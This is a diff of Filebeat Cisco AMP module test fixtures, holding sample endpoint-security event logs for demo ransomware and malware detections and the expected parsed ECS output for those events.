Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json new file mode 100644 index 00000000000..b1d52f25c8a --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json @@ -0,0 +1,2349 @@ +[ + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835279", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 459000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 1186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204901661835278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 443000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2465, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3738, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204897366867979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 6000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5108, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867971", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 6470, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117251", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", 